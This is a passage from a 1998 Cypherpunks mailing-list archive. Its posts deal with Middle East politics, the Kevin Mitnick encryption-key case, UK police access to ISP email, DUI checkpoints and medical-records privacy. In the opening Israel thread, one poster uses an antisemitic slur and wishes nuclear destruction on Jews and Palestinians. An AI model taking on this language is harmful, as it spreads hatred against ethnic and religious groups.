when they ham-fisted decided that the "homeland" the "Jews" needed was land
considered holy by the Moslems AND Christians, and ignored the fact that
the jews were just as racist and bigoted as a group as the Kikes that had
been trying to cook them.

	Israel was a DUMB idea, like mixing Nitric acid and Glycerol in a
blender. Anyone who thought it wouldn't end in violence was a total fool,
anyone who thinks that the Powers That Be want it cool down is a bigger
fool.



petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 9 Sep 1998 07:32:19 +0800
To: "William H. Geiger III" <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <v03130306b21b29f68511@[209.66.100.138]>
Message-ID: <v03110710b21b6a259806@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:44 PM -0500 9/8/98, William H. Geiger III wrote:
>What the Arabs have attempted to do is finish the job the Nazi's started.

	Bullshit.

	I don't care much for palestinians, mostly for cultural reasons,
but they were, in the begininging not interested in killing every jew in
the world, they may not have liked the Northern European Jews, but from
what I've seen, there wasn't any love lost the other way.

	Personally, I hope they BOTH nuke each other off the god damn
planet and take all that fucking oil with them.

>Only the Jews are not going to go down without a fight. The continuing
>conflict in the Middle East has not been a battle of liberation but a war
>of ethnic cleansing and extermination against the Jews.

	No, more like a get off our fucking land.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kamikaze23@juno.com (M I T)
Date: Wed, 9 Sep 1998 06:37:43 +0800
To: cypherpunks@toad.com
Subject: Any good hacking sites?
Message-ID: <19980908.182213.2926.0.kamikaze23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



hey all,

any1 know of any good hacking sites that teach u the basics and stuff?

also, any1 here into AOL hacking???

thanx,
~Fallen Angel

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 07:18:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Doing nothing wrong...
Message-ID: <199809082334.SAA11809@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



It occurred to me that a great comeback to:

If you don't have anything to hide you shouldn't mind being monitored by the
police.

To which the responce should be:

Ok, since the police don't have anything to hide they shouldn't mind being
monitored by the citizens.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 09:47:49 +0800
To: Lazlo Toth <lazlototh@hempseed.com>
Subject: Re: Mitnick wants cyphertext; gov't wants keys
In-Reply-To: <v04011709b21b77ad42e7@[207.22.4.32]>
Message-ID: <199809090134.SAA14123@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



well, this is very interesting. Mitnick therefore represents
one of the first cases in which the govt is attempting
to compel keys. he's taken the 5th amendment against
giving the keys.

it looks to me like this: maybe mitnick had no backup of his
encrypted data. the FBI takes his laptop with all the
encrypted data. there may be some things in the data
that could tend to support his innocence-- but perhaps
there are other things that would tend to incriminate
him more than he already is.  so he wants the whole
set of data first, so he can make sure, without giving
the keys. the govt wants the whole set of data first, so they can 
make sure!! stalemate.

I think the govt does not have much of a case. it seems to
me that they should make the full contents of the laptop
available to the defense. it was mitnicks property. it
would be like them seizing someone's file cabinet. it
would be easy to make xerox's and return them to the
defendant.  but gosh, maybe with Rico that's too much of
a gracious act.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 09:44:03 +0800
To: cypherpunks@cyberpass.net
Subject: internet monitoring, UK
Message-ID: <199809090136.SAA14290@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

From: "ama-gi ISPI" <offshore@email.msn.com>
To: <Undisclosed.Recipients@majordomo.pobox.com>
Subject: IP: ISPI Clips 4.25:UK Police May Soon Tap Your Email & Internet Use At Will
Date: Tue, 8 Sep 1998 01:16:50 -0700

ISPI Clips 4.25:UK Police May Soon Tap Your Email & Internet Use At Will
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday September 8, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Independent Network, Monday September 7, 1998
http://www.independent.co.uk

The PC in your mailbox:
The police may soon be allowed to read your email and check your Internet
use at will.
http://www.independent.co.uk/net/980907ne/index.html

By
Paul Lavin

When you drop an envelope in a red pillar-box, you walk away confident that
your mail will not be read by anyone except the addressee. However, when
you send an email, it might be wise to reflect on the differences.

According to the organisation Internet Freedom, an agreement being
negotiated between the UK's internet service providers (ISPs) and the
police will open the email of the UK's eight million Internet users to
scrutiny without debate in Parliament or oversight by the courts or the
Home Secretary.

British police are said to be close to reaching an agreement with ISPs that
will enable them to monitor customers' emails and web usage logs. Chris
Ellison of Internet Freedom, says: "Following a series of meetings between
the Association of Chief Police Officers (ACPO) and Internet industry
representatives, we understand that both groups have stated a willingness
to reach a 'memorandum of understanding' about implementing police access
to private data held by ISPs."

According to David Kennedy, chairman of the Internet Service Providers
Association, that is a serious overstatement of the discussions. However,
he admits that the UK's ISPs are trying to avoid being flooded by court
orders or having the police cart off critical servers for evidence. He
says: "We are talking to law enforcement representatives to find a way to
work with them within the legal framework that exists. All members of our
association take the view that emails are private."

As with the understanding between the Metropolitan Police and the ISPs over
"banned" Usenet newsgroups and the closing down of web sites that may
breach the law, the significance of such an agreement is that any such
police activity may not be subjected to judicial review or legal
constraint. Detective Chief Superintendent Keith Ackerman, chairman of the
ACPO's computing crimes sub-committee, says: "We want to ensure the
criminal doesn't take best advantage of the Internet, without requiring the
Government to use the sledgehammer of regulation. However, we are not
looking for the ability to go on fishing expeditions."

The ISPs know that they are stuck in the middle, according to Keith
Mitchell, chairman of Linx, a partnership of large ISPs. He says: "To
divulge private email even under duress would be commercial suicide for an
ISP. In some circumstances it would constitute a crime."

Nonetheless, mistakes happen and there are well-known cases where the
police have been persuasive. Mitchell says: "The current laws do not
adequately protect ISPs or private individuals. We will be active in
seeking responsive changes from Parliament."

While there are undoubtedly individuals who use the Internet's email and
worldwide web for nefarious purposes, the vast majority of people who use
email and the web for personal and business communications have an
expectation of privacy. And law-abiding citizens who wholeheartedly support
the goals of law enforcement agencies may nevertheless feel uneasy about
giving them carte blanche over email.

America Online has been quite vocal in its opposition to opening the doors
to the police short of a court order. Many ISPs agree. Julie Hatch,
marketing communications director of Easynet, says:"We do not allow anyone
to access our customers' email without a court order.

"It makes no difference if it is an estranged wife or a suspicious business
partner or anyone else, we would not divulge a subscriber's private email
unless we were presented with a court order. This is in accordance with our
terms and conditions.

"Our business is also subject to restrictions imposed by the Data
Protection Act (DPA), and in any situation we would certainly abide by
those rules. So unless a subscriber's actions are illegal, you can say that
email is confidential."

The DPA provides scanty protection to email users, however.

While the Act has aspects that protect the quality and use of information
held in computer systems, disclosure can be afforded by a compliant ISP by
simply including appropriate language in the small print of their terms and
conditions. Data may be revealed to law enforcement officials as long as
the subscriber is notified.

Easynet's assurances highlight the differences between ISPs that are
classified as telecoms providers, protected from feeling the long arm of
the law by a regulatory framework, and those that are merely private
businesses unaccountable to anyone but their owners and governed solely by
their contracts with subscribers.

As well as Easynet, UK ISPs that are regulated as telecoms providers
include BT Internet and Demon, which is now part of Scottish Telecom.

Smaller ISPs are more vulnerable to the persuasive demands of the
police.They have no legally protected right of privacy and any redress for
email disclosure would only be for breach of contract.

Furthermore, most ISPs now include in their terms and conditions a
requirement that the subscriber bear the expense of any legal costs
resulting from their use of the service. This could lead to a complaining
subscriber having to bear the costs of both sides of a lawsuit against an
ISP even if they won.

The most serious aspect of this potential agreement between the police and
ISPS is, according to critics, the absence of legal safeguards. In order to
tap telephones, the police need the permission of the Home Secretary and
must justify violating the privacy of a suspect. It is not clear from the
law whether tapping a telephone and tapping into an email exchange are the
same thing.

Chris Ellison says: "This is what is so dangerous about the new culture of
private regulation and moral responsibility. ISPs now operate in a moral
climate which insists on limitations for freedom of speech. Any material
that causes offence - especially to children and ethnic minorities - is
regularly removed. ISPs have now embraced this self-censorship credo and
are willing to set themselves up as moral arbiters of internet content,
filtering out anything that they feel may be illegal."

Without public debate or scrutiny by Parliament, the police are likely to
gain, as Liz Parratt from the organisation Liberty puts it, "a snoopers'
charter for the Internet". Ordinary users will have little legal protection
or redress against police monitoring of their communications. This trend
could render the Internet less private and more regulated than any other
communications medium.

"If nothing else, these discussions have demonstrated what self-regulation
really means: ISPs undertaking the role of publicly unaccountable
instruments of law enforcement."

Email is not like a letter in an envelope; it is more like a postcard. Just
as you would not put some messages on a postcard, you should think before
you use email for your most private communications. While the legality and
desirability of the any agreement between ACPO and the ISPs is highly
debatable, anyone interested in maintaining their privacy on the Internet
must take responsibility for their own actions.

The agreement between ACPO and ISPs will be the subject of three seminars:
22 September in Edinburgh, 8 October in London and 27 October in
Manchester. Additional details can be found at
http://www.linx.net/misc/acposeminar.html .


- --------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
- ---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a daily bases
(approx. 4 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.














































**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 07:44:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809082359.SAA12044@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Sep 1998 18:17:45 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism

> planet and take all that fucking oil with them.

I wonder how the new realization that the calthrate deposits in the ocean
bottem off the continental shelf make fine fuel and it's replenishable and
may be of a larger quantity than the oil reserves will effect the power
balance.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 10:17:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Tax silliness
In-Reply-To: <v0313030fb21a54ac6b9b@[209.66.100.36]>
Message-ID: <v03130300b21b8feed222@[209.66.100.138]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:39 PM -0700 9/7/98, Tim May wrote:
>Folks, I generally restrain myself from passing on all the various news
>stories I see or read.
>
>But tonight Fox News is reporting that the IRS has said it may seek to
>assess "gift taxes" if the guy who recovered Mark McGwire's 61st home
>baseball gives the ball back to Mark McGwire.
>
>(The ball is said to have a street value, to museums or collectors, of
>$250K or so. The 62nd home run ball, the one which breaks Maris' record,
>will supposedly be worth more than a million bucks.)

As you may have heard by now, if you are watching the game tonight, the IRS
Commissioner issued a statement saying anyone who gets the ball and gives
it to another (esp. McGwire) will NOT face taxes.

(Ah, but will McGwire face taxes on such a gift? Just think, had the IRS
not issued a royal decree absolving the perpetrator of taxes, they could
have collected taxes on the guy who got the ball and then taxes on the guy
who had the ball given to him. Through the miracle of multiple taxation,
the IRS gets it all....)

The IRS Commissioner also acknowledged the absurdity of this particular
clause of the tax code, and compared the tax code to obscure baseball rules.

Someone suggested in private e-mail to me that the IRS would likely _not_
seek taxes, but acknowledged that it _could_. And there's the rub.

As it happens, a ballpark employee actually _caught_ the ball, it is being
reported, in a special restricted zone. He says he'll give the ball to
McGwire ("but I don't want to be taxed!" he said on camera). Possibly a
good deal for him, as it heads off a typically American lawsuit by the
owners of the ballpark claiming they own the fruits of his labor, and he
maybe gets a minor book deal, and he avoids villification by the Oprah and
Geraldo crowd.

(I confess that if I'd gotten the ball I'd let capitalism work its magic by
selling the ball to the highest bidder. A million bucks, for starters.)

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Wed, 9 Sep 1998 07:20:58 +0800
To: cypherpunks@cyberpass.net
Subject: Mitnick wants cyphertext; gov't wants keys
Message-ID: <v04011709b21b77ad42e7@[207.22.4.32]>
MIME-Version: 1.0
Content-Type: text/plain



>http://www.wired.com/news/print_version/politics/story/14855.html
>
>Wired News:
>Hacker Can't Get Access
>By Arik Hesseldahl
>
>8:35pm  4.Sep.98.PDT
>
>The epic legal wrangling in the Kevin Mitnick case took a new turn last
>week when the accused hacker lost an appeal  to access certain encrypted
>data that his attorneys say could help him.
>The data, seized by the FBI from Mitnick's computer when he was arrested in
>1995, could contain evidence that could prove him innocent of some of the
>charges against him, according to his defense.
>In its encrypted form, the data is useless to prosecutors, who may have
>tried to decode it and failed, said Donald C. Randolph, the Santa Monica,
>California, attorney defending Mitnick.
>....
>"We told the judge that giving him access to those files was like giving
>someone access to a locked safe that might contain a gun," Painter said.
>"[Mitnick's attorneys] claimed in court that the data might contain
>exculpatory evidence but offered no further explanation."
>Greg Vincent, Randolph's associate on the case, said that under federal
>rules, Mitnick should be given access to all the evidence against him, and
>that by denying such access, the government is opening itself up to losing
>an appeal should Mitnick be convicted.
>Vincent also said the government was willing to give access to the
>encrypted files, provided that Mitnick hand over the password. This, said
>Vincent, would violate Mitnick's Fifth Amendment rights against
>self-incrimination.         
>Painter confirmed that the files had not been decrypted by the government.    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 08:06:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Spelling error...
Message-ID: <199809090019.TAA12278@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It's clathrate, not calthrate...

Sorry.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:27:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 4.25:UK Police May Soon Tap Your Email & Internet Use At Will
Message-ID: <199809090224.TAA18211@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 4.25:UK Police May Soon Tap Your Email & Internet Use At Will
Date: Tue, 8 Sep 1998 01:16:50 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 4.25:UK Police May Soon Tap Your Email & Internet Use At Will
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday September 8, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Independent Network, Monday September 7, 1998
http://www.independent.co.uk

The PC in your mailbox:
The police may soon be allowed to read your email and check your Internet
use at will.
http://www.independent.co.uk/net/980907ne/index.html

By
Paul Lavin

When you drop an envelope in a red pillar-box, you walk away confident that
your mail will not be read by anyone except the addressee. However, when
you send an email, it might be wise to reflect on the differences.

According to the organisation Internet Freedom, an agreement being
negotiated between the UK's internet service providers (ISPs) and the
police will open the email of the UK's eight million Internet users to
scrutiny without debate in Parliament or oversight by the courts or the
Home Secretary.

British police are said to be close to reaching an agreement with ISPs that
will enable them to monitor customers' emails and web usage logs. Chris
Ellison of Internet Freedom, says: "Following a series of meetings between
the Association of Chief Police Officers (ACPO) and Internet industry
representatives, we understand that both groups have stated a willingness
to reach a 'memorandum of understanding' about implementing police access
to private data held by ISPs."

According to David Kennedy, chairman of the Internet Service Providers
Association, that is a serious overstatement of the discussions. However,
he admits that the UK's ISPs are trying to avoid being flooded by court
orders or having the police cart off critical servers for evidence. He
says: "We are talking to law enforcement representatives to find a way to
work with them within the legal framework that exists. All members of our
association take the view that emails are private."

As with the understanding between the Metropolitan Police and the ISPs over
"banned" Usenet newsgroups and the closing down of web sites that may
breach the law, the significance of such an agreement is that any such
police activity may not be subjected to judicial review or legal
constraint. Detective Chief Superintendent Keith Ackerman, chairman of the
ACPO's computing crimes sub-committee, says: "We want to ensure the
criminal doesn't take best advantage of the Internet, without requiring the
Government to use the sledgehammer of regulation. However, we are not
looking for the ability to go on fishing expeditions."

The ISPs know that they are stuck in the middle, according to Keith
Mitchell, chairman of Linx, a partnership of large ISPs. He says: "To
divulge private email even under duress would be commercial suicide for an
ISP. In some circumstances it would constitute a crime."

Nonetheless, mistakes happen and there are well-known cases where the
police have been persuasive. Mitchell says: "The current laws do not
adequately protect ISPs or private individuals. We will be active in
seeking responsive changes from Parliament."

While there are undoubtedly individuals who use the Internet's email and
worldwide web for nefarious purposes, the vast majority of people who use
email and the web for personal and business communications have an
expectation of privacy. And law-abiding citizens who wholeheartedly support
the goals of law enforcement agencies may nevertheless feel uneasy about
giving them carte blanche over email.

America Online has been quite vocal in its opposition to opening the doors
to the police short of a court order. Many ISPs agree. Julie Hatch,
marketing communications director of Easynet, says:"We do not allow anyone
to access our customers' email without a court order.

"It makes no difference if it is an estranged wife or a suspicious business
partner or anyone else, we would not divulge a subscriber's private email
unless we were presented with a court order. This is in accordance with our
terms and conditions.

"Our business is also subject to restrictions imposed by the Data
Protection Act (DPA), and in any situation we would certainly abide by
those rules. So unless a subscriber's actions are illegal, you can say that
email is confidential."

The DPA provides scanty protection to email users, however.

While the Act has aspects that protect the quality and use of information
held in computer systems, disclosure can be afforded by a compliant ISP by
simply including appropriate language in the small print of their terms and
conditions. Data may be revealed to law enforcement officials as long as
the subscriber is notified.

Easynet's assurances highlight the differences between ISPs that are
classified as telecoms providers, protected from feeling the long arm of
the law by a regulatory framework, and those that are merely private
businesses unaccountable to anyone but their owners and governed solely by
their contracts with subscribers.

As well as Easynet, UK ISPs that are regulated as telecoms providers
include BT Internet and Demon, which is now part of Scottish Telecom.

Smaller ISPs are more vulnerable to the persuasive demands of the
police.They have no legally protected right of privacy and any redress for
email disclosure would only be for breach of contract.

Furthermore, most ISPs now include in their terms and conditions a
requirement that the subscriber bear the expense of any legal costs
resulting from their use of the service. This could lead to a complaining
subscriber having to bear the costs of both sides of a lawsuit against an
ISP even if they won.

The most serious aspect of this potential agreement between the police and
ISPS is, according to critics, the absence of legal safeguards. In order to
tap telephones, the police need the permission of the Home Secretary and
must justify violating the privacy of a suspect. It is not clear from the
law whether tapping a telephone and tapping into an email exchange are the
same thing.

Chris Ellison says: "This is what is so dangerous about the new culture of
private regulation and moral responsibility. ISPs now operate in a moral
climate which insists on limitations for freedom of speech. Any material
that causes offence - especially to children and ethnic minorities - is
regularly removed. ISPs have now embraced this self-censorship credo and
are willing to set themselves up as moral arbiters of internet content,
filtering out anything that they feel may be illegal."

Without public debate or scrutiny by Parliament, the police are likely to
gain, as Liz Parratt from the organisation Liberty puts it, "a snoopers'
charter for the Internet". Ordinary users will have little legal protection
or redress against police monitoring of their communications. This trend
could render the Internet less private and more regulated than any other
communications medium.

"If nothing else, these discussions have demonstrated what self-regulation
really means: ISPs undertaking the role of publicly unaccountable
instruments of law enforcement."

Email is not like a letter in an envelope; it is more like a postcard. Just
as you would not put some messages on a postcard, you should think before
you use email for your most private communications. While the legality and
desirability of the any agreement between ACPO and the ISPs is highly
debatable, anyone interested in maintaining their privacy on the Internet
must take responsibility for their own actions.

The agreement between ACPO and ISPs will be the subject of three seminars:
22 September in Edinburgh, 8 October in London and 27 October in
Manchester. Additional details can be found at
http://www.linx.net/misc/acposeminar.html .


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a daily bases
(approx. 4 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.














































**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:31:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] FW: Americans love a police state
Message-ID: <199809090224.TAA18222@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] FW: Americans love a police state
Date: Tue, 8 Sep 1998 06:46:54 -0500
To: ignition-point@majordomo.pobox.com

[Forwarded message]

[The driver's license/ID serves as the link, giving police the "authority"
to set up so-called "DUI checkpoints." These are in reality ID checkpoints.
That is the fact. They can stop you and ask to se the DL/ID because it
actually belongs to the state and the state can demand it any time they
like. The next time you hear someone talking about how great these DUI stops
are, just remember, they are really ID checkpoints -- do you have your
papers?]

-------------------------------

WND - Letters to the editor
http://www.worldnetdaily.com/e-mail/98.e-mail.html

Americans love a police state

I think I've said this before but I'm amazed how our society (America)
has adopted like a favorite pet, the concept of DUI CHECKPOINTS. They
don't even call them POLICE CHECKPOINTS but DUI CHECKPOINTS because the
MAD mothers convinced America that everyone must be a drunk driver,
therefore you need DUI CHECKPOINTS. Remember, it is for the
children!

I heard a news brief this morning telling viewers "this holiday weekend
most law enforcement agencies in the city and county (San Diego) will be
conducting DUI checkpoints." Then the report showed statistics of a
checkpoint that was conducted last night saying 643 cars were checked
and 4 drivers were arrested, three for DUI while seven cars were
impounded. My math shows that only less than one half of one-percent
(00.47 percent) were DUI in the checkpoint last night. This clearly
should be evidence to the Beanie Baby collectors in their sport utility
vehicles that people who are not intoxicated while driving are being
subject to arrest for other items along with drivers having their cars
towed because they missed an insurance payment or did not register their
car because the new SMOG II standards caused their car to be classified
as a
GORE or GROSS POLLUTER. By the way, the insurance companies in America
are some of the
most corrupt and greedy institutions that contribute to all those
politicians who require you have insurance. Talk about the oligarchs in
Russia, we have them here already!

As Americans we thought we had free speech and free movement but not
with these
checkpoints. And you know how they tell you that you can turn around
before a checkpoint to avoid it? WRONG! The Supreme Court did rule that
there must be a sign with a point that vehicles may do a 180 but the
problem is that law enforcement actively posts a patrol vehicle or two
with lights off near that turn-around point and then they follow whoever
avoids the checkpoint and stop them on probable cause.

When will these checkpoints seize cash if you cannot account for the
$1,000 you carry? They are already doing this at the border leaving
America. When will these checkpoints seize anti-government printed
e-mail messages (I carry this kind of stuff in my car, sometimes books
on the New World Order or Illuminati) because of a new ANTI-TERRORIST
LAW? This week your friendly politicians held hearings interviewing
Louis Freeh of FBI and ex-CIA Directors (most of the ex-Directors are
dead now, i.e. Colby and Casey, etc., so I think they only had one to
use) with an active discussion that items that were
originally thrown out of the ANTI TERRORIST BILL need to be re-included
to protect against those nasty Islamic terrorists. Sure!

I also have a King James Bible in my car (been accident free for at
least 300,000 miles) and maybe one day at the checkpoint they'll grab
that and say "don't get caught with that again." "You know those
Christians are dangerous people" the two cops will say to one another,
"those Christians are against abortion and euthanasia, can you believe
that Sam?"

DARREN


-----Original Message-----
From: Jim Groom [mailto:gs924jfj@mon-cre.net]
Sent: Tuesday, September 08, 1998 5:11 AM
To: Current Events
Subject: Americans love a police state






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:31:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Congress's Secret Plans to Get Our Medical Records
Message-ID: <199809090224.TAA18233@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Congress's Secret Plans to Get Our Medical Records
Date: Tue, 8 Sep 1998 06:47:05 -0500
To: ignition-point@majordomo.pobox.com

Congress's Secret Plans to Get Our Medical Records

http://www.eagleforum.org/column/1998/aug98/98-08-19.html

August 19, 1998

Americans were outraged to learn about the Federal Government's plans to
assign a personal identification number to every medical patient. But
Congress nevertheless passed H.R. 4250, the so-called Patient Protection
Act, which allows anyone who maintains your personal medical records to
gather, exchange and distribute them.

The only condition on distribution is that the information be used for
"health care operations," which is a vague and meaningless limitation that
does not even exclude marketing. Even worse, H.R. 4250 preempts state laws
that currently protect patients from unauthorized distribution of their
medical records.

While the sponsors of H.R. 4250 claim that they did not intend for the
information to be circulated for "just anything," their spokesman confirmed
that personal medical records would be used for future programs concerning
health quality and disease management.

When the Kennedy-Kassebaum law was passed in 1996, we were told it was to
improve access to health insurance. The law became explosively controversial
last month when the Department of Health and Human Services (HHS) began to
implement the Kennedy-Kassebaum "unique health care identifiers" so that
government can electronically tag, track and monitor every citizen's
